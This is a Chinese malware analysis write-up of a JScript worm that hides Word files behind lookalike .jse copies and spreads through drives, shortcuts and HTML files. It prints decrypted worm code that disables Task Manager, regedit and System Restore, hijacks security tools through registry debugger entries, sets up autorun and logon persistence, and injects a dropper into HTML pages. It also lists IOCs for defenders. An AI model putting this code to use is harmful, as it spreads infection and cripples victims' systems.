一例jse蠕虫的分析

概述

这是一例jse格式的蠕虫病毒,会隐藏系统中所有的doc、docx和rtf文件,创建同名的.jse文件,诱导用户点击执行,通过感染U盘和网络驱动器、光盘刻录临时文件夹、html文件进行传播。

这个样本是使用JScript语言编写的加密脚本文件,可以使用cscript.exe来执行,分析起来没有难度,但是其修改注册表的操作的还是很高明的。

样本信息

MD5: 4d1a9f7559de521e1458021a1a7df7cf
SHA1: b7f8913852e17aed219ef544272971bc36e30f38
SHA256: abb9839405654d2f44e85e4e36d6da429513a34322ce5b181807b30c56b96c73

样本使用Jscript脚本编写,并使用加密。

分析过程

使用在线解密工具(JScript.Encode 在线解密 (jb51.net))对脚本进行解密,解密后对脚本进行格式化(Online JavaScript beautifier)。解密后的脚本如下图所示。

下面来分析解密后的脚本内容。

使用vscode打开解密后的脚本文件。(因为vscode支持重命名全局变量和局部变量、转到定义、折叠和展开代码,这些功能对分析脚本类病毒非常友好)

下面的病毒的主函数的逻辑,主要分了好几种启动情形。

if 当前脚本不是.jse结尾,且有参数:if 参数1/e:(这是运行annie.sys /e的情况)执行 cscript.exe //e:jscript annie.sys /r 休眠0.1s执行 cscript.exe //e:jscript annie.sys /s 休眠0.1s执行 cscript.exe //e:jscript annie.sys /n 休眠0.1selif 参数1/r:while(当前文件名为annie.sys):在光盘记录刻录区创建  annie.ani和autorun.inf,感染光盘修改一堆注册表项,并添加开机启动项修改系统.jse文件的显示图标为word的图标休眠1selif 参数1/s:while(当前文件名为annie.sys):遍历系统驱动器,找到可移动存储介质和固定驱动器 Removable=1 Fixed=2在驱动器根目录创建自身副本,保存为X:\annie.ini 并隐藏创建一个autorun.inf文件并隐藏 用于自启动在驱动器的根目录创建beautiful_girl_part_[1-5].lnk文件,图标为windows media player的图标,指向`wscript.exe //e //e:jscript annie.ani /q:[1-5]`感染驱动器中所有的将doc、docx、rtf文件隐藏,创建同名副本,在htm、html文件中嵌入一段js脚本,用于传播自身elif 参数1/n:while(当前文件名为annie.sys):遍历系统当前的网络驱动器在驱动器根目录写入病毒副本,保存为X:\annie.ini,并隐藏在驱动器的根目录创建beautiful_girl_part_[1-5].lnk文件,图标为windows media player的图标,指向`wscript.exe //e //e:jscript annie.ani /q:[1-5]`感染驱动器中所有的将doc、docx、rtf文件隐藏,创建同名副本,在htm、html文件中嵌入一段js脚本,用于传播自身休眠15分钟elif 参数1/t: (这种情况是被感染的html文件释放病毒并启动的情形)若C:\windows\system32\drivers\annie.sys不存在 ,创建并启动 annie.sys /e执行`cmd /c del /q /f [selfFileName]` 删除自身elif 参数1/a:(这种情况是autorun.inf启动annie.ini的情形)若C:\windows\system32\drivers\annie.sys不存在 ,创建并启动 annie.sys /e执行`explorer.exe /e,/select, [selfFileName]` else:(这是双击beautiful_girl_part_[1-5].lnk的情形)若C:\windows\system32\drivers\annie.sys不存在 ,创建并启动 annie.sys /e执行 `wmplayer.exe beautiful_girl_part_[arg['q']].avi"`
else:(用户双击伪装成word文档的.jse文件)将病毒母体写入到C:\windows\system32\drivers\annie.sys,并启动 wscript.exe //e:jscript annie.sys /e打开当前目录下同名的doc、docx、rtf文件

注册表行为

这个病毒修改了许多系统注册表项,用于隐藏自己,不被发现。

//修改注册表 添加  开机自启动
function SetReg() {//删除右键菜单中打开方式 ws_shell.RegDelete('HKCR\\*\\shellex\\ContextMenuHandlers\\Open With\\');//将inf文件默认打开方式改变 删除  'cmd.exe /c del /q /f "%1"ws_shell.RegWrite('HKCR\\' + ReadRegHKCR('.inf') + '\\shell\\Install\\command\\', 'cmd.exe /c del /q /f "%1"', 'REG_EXPAND_SZ');//将jse文件 默认编辑 改为 打开ws_shell.RegWrite('HKCR\\' + ReadRegHKCR('.JSE') + '\\Shell\\Edit\\Command\\', ReadRegHKCR(ReadRegHKCR('.JSE') + '\\Shell\\Open\\Command\\'), 'REG_EXPAND_SZ');ws_shell.RegDelete('HKCR\\' + ReadRegHKCR('.JSE') + '\\Shell\\Open2\\');  ws_shell.RegDelete('HKCR\\' + ReadRegHKCR('.JSE') + '\\Shell\\Open2\\Command\\');ws_shell.RegDelete('HKCR\\' + ReadRegHKCR('.JSE') + '\\ShellEx\\PropertySheetHandlers\\WSHProps\\');// .reg的默认打开方式改为删除 ws_shell.RegWrite('HKCR\\' + ReadRegHKCR('.reg') + '\\shell\\open\\command\\', 'cmd.exe /c del /q /f "%1"', 'REG_EXPAND_SZ');//不允许用户更改文件属性ws_shell.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileAssociate', '1', 'REG_DWORD');//禁止regedit修改注册表 ws_shell.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools', '1', 'REG_DWORD');//禁用任务管理器ws_shell.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr', '1', 'REG_DWORD');//隐藏 组策略ws_shell.RegWrite('HKCU\\Software\\Policies\\Microsoft\\MMC\\RestrictToPermittedSnapins', '1', 'REG_DWORD');//修改这些程序的执行命令行 attrib.exe autoruns.exe procexp.exe reg.exe RegAlyzer.exe taskkill.exews_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\attrib.exe\\Debugger', 'cmd.exe /c rem');ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\autoruns.exe\\Debugger', 'cmd.exe /c del /q /f'); ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\procexp.exe\\Debugger', 'cmd.exe /c del /q /f');ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\reg.exe\\Debugger', 'cmd.exe /c rem');ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RegAlyzer.exe\\Debugger', 'cmd.exe /c del /q /f');ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskkill.exe\\Debugger', 'cmd.exe /c rem');//设置开机自启动 wscript.exe //e:jscript annie.sys /ews_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit', sys_dir + '\\userinit.exe,wscript.exe //e:jscript ' + annie_sys_filename + ' /e');//隐藏已知文件扩展名 不能更改ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\HideFileExt\\UncheckedValue', '1', 'REG_DWORD');//无法显示“隐藏受保护的操作系统文件”ws_shell.RegWrite('HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\SuperHidden\\UncheckedValue', '0', 'REG_DWORD');//禁用系统还原ws_shell.RegWrite('HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\\DisableConfig', '1', 'REG_DWORD');ws_shell.RegWrite('HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\\DisableSR', '1', 'REG_DWORD');   
}

感染与传播行为

该样本的感染行为有:感染各固定驱动器、移动存储介质、系统临时刻录文件夹、网络驱动器,会隐藏doc、docx、rtf文件,创建同名的.jse文件(为病毒副本,使用word图标),诱导用户点击,感染、htm和html文件,向其中嵌入恶意js代码。

感染驱动器根目录

在所有驱动器的根目录,创建X:\annie.aniX:\autorun.inf两个隐藏文件,其中annie.ani为病毒副本,autorun.inf文件内容如下,用于病毒自启动。

[autorun]
shellexecute=wscript.exe //e:jscript annie.ani /a
shell\open\command=wscript.exe //e:jscript annie.ani /a
shell\explore\command=wscript.exe //e:jscript annie.ani /a

此外还会创建5个lnk文件X:\beautiful_girl_part_[1-5].lnk,指向
C:\Windows\system32\wscript.exe //e:jscript.encode annie.ani /q:[1-5],这些快捷方式的图标为windows Media Player的图标,让用户误以为是视频,当用户点击这几个快捷方式文件,系统会被感染。

创建lnk文件的代码如下

//在驱动器的根目录创建beautiful_girl_part_[1-5].lnk文件,图标为windows media player的图标,指向`wscript.exe //e //e:jscript annie.ani /q:[1-5]`
function CreateLnkFile(rootPath) {for (var i = 1; i <= 5; i++) {var filename = rootPath + 'beautiful_girl_part_' + i + '.lnk';if (!fs_obj.FileExists(filename)) {try {var lnk = ws_shell.CreateShortcut(filename);lnk.IconLocation = 'wmploc.dll,8'; //快捷方式的图标 windows系统播放器的图标 lnk.TargetPath = 'wscript.exe'; //wscript.exe //e //e:jscript annie.ani /q:[i]lnk.Arguments = '//e:jscript annie.ani ' + '/q:' + i;lnk.Save();} catch (e) {}}}
}

隐藏系统内word文件,创建同名jse文件

该病毒会隐藏固定驱动器、可移动存储介质和网络驱动中所有doc、docx、rtf文件,并将自身副本拷贝成同名的.jse文件,并通过修改注册表的方式将.jse文件的默认图标修改为word图标,这样用户若看不到后缀名的情况下会误以为.jse文件为word文档。
修改.jse文件图标的代码如下

function ChangeICO(extension) {//修改jse文件的图标 为doc文件的图标 ws_shell.RegWrite('HKCR\\' + ReadRegHKCR('.JSE') + '\\', ReadRegHKCR(ReadRegHKCR(extension) + '\\'));ws_shell.RegWrite('HKCR\\' + ReadRegHKCR('.JSE') + '\\DefaultIcon\\', ReadRegHKCR(ReadRegHKCR(extension) + '\\DefaultIcon\\'));ws_shell.RegWrite('HKCR\\' + ReadRegHKCR('.JSE') + '\\FriendlyTypeName', ReadRegHKCR(ReadRegHKCR(extension) + '\\'), 'REG_EXPAND_SZ');
}//修改jse文件的图标为docx文件的图标 
function ChangeJseIco() {try {ChangeICO('.docx');} catch (e) {try {ChangeICO('.doc');} catch (e) {try {ChangeICO('.rtf');} catch (e) {}}}
}

感染htm和html文件

感染htm、html文件的代码如下:

//感染 html文件
function infect_html(htm_filename) {var niaxw = '<!--[ANNIE83E333BF08546819]-->';if (ReadFirstLine(htm_filename) != niaxw) { //若第1行不是 <!--[ANNIE83E333BF08546819]-->var html_txt = ReadTxtFile(htm_filename);var ki4io = SelfFileText.replace(/\\/g, '\\\\');//转义var v0l9m = ki4io.replace(/\'/g, '\\\'');//转义var p7r2q = '<html>\n<script type="text/javascript">\n<!--\nvar ayfp6=new ActiveXObject(\'Scripting.FileSystemObject\');var dk5h8=new ActiveXObject(\'WScript.Shell\');var s41k8=ayfp6.GetSpecialFolder(2);var bgw3u=ayfp6.GetTempName();var vlx8c=\'' + v0l9m + '\'+String.fromCharCode(0);var rwyg5=ayfp6.CreateTextFile(s41k8+\'\\\\\'+bgw3u,true);rwyg5.Write(vlx8c);rwyg5.Close();dk5h8.Run(\'wscript.exe //e:jscript \'+s41k8+\'\\\\\'+bgw3u+\' /t\');\n//-->\n</script>\n</html>';SetFileAttr(htm_filename, 0);try {var k4y0d = fs_obj.OpenTextFile(htm_filename, 2);k4y0d.WriteLine(niaxw);k4y0d.WriteLine(html_txt);k4y0d.WriteLine(p7r2q);k4y0d.Close();} catch (e) {}}
}

感染后的html文件如下图。

如上图所示,该病毒会在htm、html文件开头添加一行,内容为<!--[ANNIE83E333BF08546819]-->,作为感染的标记,在文件末尾添加一段js代码。
js代码的功能是将病毒母体保存到临时目录下,执行wscript.exe //e:jscript.encode virus_filename /t,执行感染操作后,删除这个临时文件,不过这段代码在现在的浏览器中好像无法执行。

<html>
<script type="text/javascript">
< !--var ayfp6 = new ActiveXObject('Scripting.FileSystemObject'); var dk5h8 = new ActiveXObject('WScript.Shell'); var s41k8 = ayfp6.GetSpecialFolder(2); var bgw3u = ayfp6.GetTempName(); var vlx8c = 'jse文件内容' + String.fromCharCode(0); var rwyg5 = ayfp6.CreateTextFile(s41k8 + '\\' + bgw3u, true); rwyg5.Write(vlx8c); rwyg5.Close(); dk5h8.Run('wscript.exe //e:jscript.encode ' + s41k8 + '\\' + bgw3u + ' /t');
//-->
</script></html>

感染光盘刻录临时文件夹

会在C:\Users\[UserName]\AppData\Local\Microsoft\Windows\Burn\Burn\目录下创建两个隐藏文件:annie.ani(病毒副本)和autorun.inf(自启动文件)。代码如下:

//在光盘记录刻录区创建两个隐藏文件  annie.ani和autorun.inf
function InfectCDBurningDir() {try {var e9hgn = ws_shell.RegRead('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\CD Burning');WriteSelf(e9hgn + '\\annie.ani');CreateInfFile(e9hgn + '\\autorun.inf');} catch (e) {}
}

IOC

hash 
MD5: 4d1a9f7559de521e1458021a1a7df7cf
SHA1: b7f8913852e17aed219ef544272971bc36e30f38
SHA256: abb9839405654d2f44e85e4e36d6da429513a34322ce5b181807b30c56b96c73文件
C:\windows\system32\drivers\annie.sys 文件大小为9201字节
X:\annie.ini 
X:\autorun.inf 174字节
C:\Users\[UserName]\AppData\Local\Microsoft\Windows\Burn\Burn\annie.ini
C:\Users\[UserName]\AppData\Local\Microsoft\Windows\Burn\Burn\autorun.infX:\beautiful_girl_part_[1-5].lnk 图标为windows Media Player的图标
.doc .docx .rtf文件变成同名的.jse文件,使用为word图标
.htm .html文件的第一行变成<!--[ANNIE83E333BF08546819]-->注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSEFile\Shell\Edit\Command=C:\Windows\System32\WScript.exe "%1" %*
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileAssociate=1
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools=1
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr=1
HKCU\\Software\\Policies\\Microsoft\\MMC\\RestrictToPermittedSnapins=1
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\attrib.exe\\Debugger=cmd.exe /c rem
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\autoruns.exe\\Debugger=cmd.exe /c del /q /f
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\procexp.exe\\Debugger=cmd.exe /c del /q /f
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\reg.exe\\Debugger=cmd.exe /c rem
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RegAlyzer.exe\\Debugger=cmd.exe /c del /q /f
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskkill.exe\\Debugger=cmd.exe /c rem
HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit=C:\windows\system32\userinit.exe,wscript.exe //e:jscript C:\windows\system32\driver/annie.sys /e
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\HideFileExt\\UncheckedValue=1
HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\SuperHidden\\UncheckedValue=0
HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\\DisableConfig=1
HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\\DisableSR=1
太多了没列完可以参考上文系统中这些进程无法使用 
attrib.exe autoruns.exe procexp.exe reg.exe RegAlyzer.exe taskkill.exe regedit

总结

这个jse病毒分析起来相对容易,解密之后,功能很容易分析清楚,但是清理起来并不容易,它隐藏了所有的word文件,且修改了系统很多重要的注册表项,禁用了attrib.exe autoruns.exe procexp.exe reg.exe RegAlyzer.exe taskkill.exe regedit,禁用了系统还原等系统设置,通过感染可移动存储介质、网络驱动器和html文件进行传播,比较奇怪的是没有网络行为。

参考资料

  • JScript 用户指南 - [ JavaScript参考手册 ] - 在线原生手册 - php中文网

  • 求助 电脑中了jse蠕虫病毒,word全变格式了,怎么办? - 『病毒救援区』 - 吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

  • JScript.Encode 在线解密 (jb51.net)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/165881.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

视频太大怎么压缩变小?三分钟学会视频压缩

随着科技的不断发展&#xff0c;视频已经成为了我们日常生活中不可或缺的一部分&#xff0c;然而&#xff0c;大尺寸的视频文件常常会给我们带来诸多困扰&#xff0c;例如发送不便、存储空间不足等等&#xff0c;那么&#xff0c;如何将这些过大的视频文件压缩变小呢&#xff1…

【数字IC设计/FPGA】FIFO与流控机制

流控&#xff0c;简单来说就是控制数据流停止发送。常见的流控机制分为带内流控和带外流控。 FIFO的流水反压机制 一般来说&#xff0c;每一个fifo都有一个将满阈值afull_value&#xff08;almost full&#xff09;。当fifo内的数据量达到或超过afull_value时&#xff0c;将满…

http post协议发送本地压缩数据到服务器

1.客户端程序 import requests import os # 指定服务器的URL url "http://192.168.1.9:8000/upload"# 压缩包文件路径 folder_name "upload" file_name "test.7z" headers {Folder-Name: folder_name,File-Name: file_name } # 发送POST请求…

通过TDE透明加密实现服务器防勒索 安当加密

安当TDE透明加密技术主要应用于对数据库中的数据执行实时加解密的应用场景&#xff0c;特别是在对数据加密有较高要求&#xff0c;以及希望加密后数据库性能影响几乎可以忽略的场景中。 安当TDE透明加密技术的防勒索应用场景可以通过以下步骤进行介绍&#xff1a; 数据保护&am…

ERR_PNPM_JSON_PARSE Unexpected end of JSON input while parsing empty string in

终端报错&#xff1a;  ERR_PNPM_JSON_PARSE  Unexpected end of JSON input while parsing empty string in   报错原因&#xff1a;依赖没有删除干净  解决办法&#xff1a;  ①删除node_modules  ②在package.json的dependencies删除不需要依赖  ③重新pnpm i

【计算机网络原理】初始网络基础

文章目录 1. 网络发展史1.1 单机时代1.2 网络互连局域网 LAN广域网 WAN 2. 网络通信基础2.1 IP 地址2.2 端口号2.3 协议2.4 五元组2.5 协议分层2.5.1 OSI七层模型2.5.2 TCP/IP五层模型 2.6 封装和分用2.6.1 数据封装(发送方情况)2.6.2 数据分用(接收方情况) 总结 1. 网络发展史…

【Javascript】构造函数的参数写法

目录 写法一&#xff08;固定参数&#xff09;&#xff1a; 写法二&#xff08;对象类型的参数&#xff09; 写法一&#xff08;固定参数&#xff09;&#xff1a; 如果参数与参数的值不对应 写法一 要求位置严格对应&#xff0c;明确知道对象的属性 写法二&#xff08;对象类…

交换机端口灯常亮 端口up状态 服务器设置ip交换机获取不到服务器网卡mac地址 不能通信

环境: 深信服防火墙 8.0.75 AF-2000-FH2130B-SC S6520X-24ST-SI交换机 version 7.1.070, Release 6530P02 问题描述: 交换机一个vlan下有3台服务器,连接端口2、3、4,2和3连接的服务器正常,交换机3端口灯常亮 端口up状态 服务器自动获取不了地址,改为手动设置ip后,交…

数据结构:排序

文章目录 1. 预备知识2. 插入排序2.1 直接插入排序2.2 折半插入排序 3. 希尔排序4. 交换排序4.1 冒泡排序4.2 快速排序4.2.1 选取基准值4.2.2 分割策略4.2.3 小数组4.2.4 基于Hoare版本 最后优化 递归版本 快速排序4.2.5 快速排序的非递归版本4.2.6 快速排序的分析 5. 选择排序…

【趣味随笔】农业机器人的种类与发展前景

&#x1f4e2;&#xff1a;如果你也对机器人、人工智能感兴趣&#xff0c;看来我们志同道合✨ &#x1f4e2;&#xff1a;不妨浏览一下我的博客主页【https://blog.csdn.net/weixin_51244852】 &#x1f4e2;&#xff1a;文章若有幸对你有帮助&#xff0c;可点赞 &#x1f44d;…

一、Qt简介

1. 什么是Qt&#xff1f; Qt是一个基于C的图形用户界面&#xff08;GUI&#xff09;开发框架&#xff0c;但图形用户界面并不是Qt的全部&#xff0c;因为Qt还包含了很多非图形化的开发功能&#xff1a;多线程、数据库、图像图形处理、音视频处理、网络通信、文件IO等。 一方面…

实现日期间的运算——C++

&#x1f636;‍&#x1f32b;️Take your time ! &#x1f636;‍&#x1f32b;️ &#x1f4a5;个人主页&#xff1a;&#x1f525;&#x1f525;&#x1f525;大魔王&#x1f525;&#x1f525;&#x1f525; &#x1f4a5;代码仓库&#xff1a;&#x1f525;&#x1f525;魔…

总结一下vue中v-bind的常见用法

文章目录 &#x1f415;前言&#xff1a;&#x1f3e8;简述一下v-bind命令&#x1f9f8;其它写法1.还是当成字符串&#x1f993;其它写法2.当成对象来使用 &#x1f415;前言&#xff1a; 本篇博客主要总结一下v-bind命令在vue中的常见用法&#xff08;看完即懂&#xff09; …

英语——歌诀篇——歌诀记忆法

介词用法速记歌 年月季前要用in&#xff0c; 日子前面却不行。 遇到几号要用on&#xff0c; 上午下午又用in。 要说某时上下午&#xff0c; 用on换in才可行。 午夜黄昏和黎明&#xff0c; 要用at不用in。 差儿分到几点&#xff0c; 写个“to”在中间。 若是几点过几分&#xf…

el-input单独校验

el-input单独校验,效果图如下 <el-col :span"24"><el-form-item label"修订次数:" prop"sPublish"><el-input-numberv-model"addForm.sPublish":min"0":controls"false":precision"0"p…

Flutter视图原理之StatefulWidget,InheritedWidget

目录 StatefulElement1. 构造函数2. build3. _firstBuild3. didChangeDependencies4. setState InheritedElement1. Element类2. _updateInheritance3. InheritedWidget数据向下传递3.1 dependOnInheritedWidgetOfExactType 4. InheritedWidget的状态绑定4.1. ProxyElement 在f…

【项目设计】网络对战五子棋(上)

想回家过年… 文章目录 一、项目前置知识1. websocketpp库1.1 http1.0/1.1和websocket协议1.2 websocketpp库接口的前置认识1.3 搭建一个http/websocket服务器 2. jsoncpp库3. mysqlclient库 二、 项目设计1. 项目模块划分2. 实用工具类模块2.1 日志宏封装2.2 mysql_util2.3 j…

3D视觉硬件技术

目前市面上主流的3D光学视觉方案有三种&#xff1a; 双目立体视觉法&#xff08;Stereo Vision&#xff0c;在下文称双目法&#xff09;&#xff0c;结构光法&#xff08;Structured Light&#xff0c;在下文称结构光&#xff09;以及飞行时间法(Time of Flight, ToF在下文称T…

【JavaEE重点知识归纳】第9节:抽象类和接口

目录 一&#xff1a;抽象类 1.概念 2.语法 3.特性 4.作用 二&#xff1a;接口 1.概念 2.语法 3.接口使用 4.特性 5.实现多个接口 6.接口间的继承 7.Comparable接口 8.Clonable接口 9.抽象类和接口的区别 一&#xff1a;抽象类 1.概念 &#xff08;1&#xff0…

iOS如何实现语音转文字功能?

1.项目中添加权限 Privacy - Speech Recognition Usage Description : 需要语音识别权限才能实现语音转文字功能 2.添加头文件 #import <AVFoundation/AVFoundation.h> #import<Speech/Speech.h> 3.实现语音转文字逻辑: 3.1 根据wav语音文件创建请求 SFSpeechU…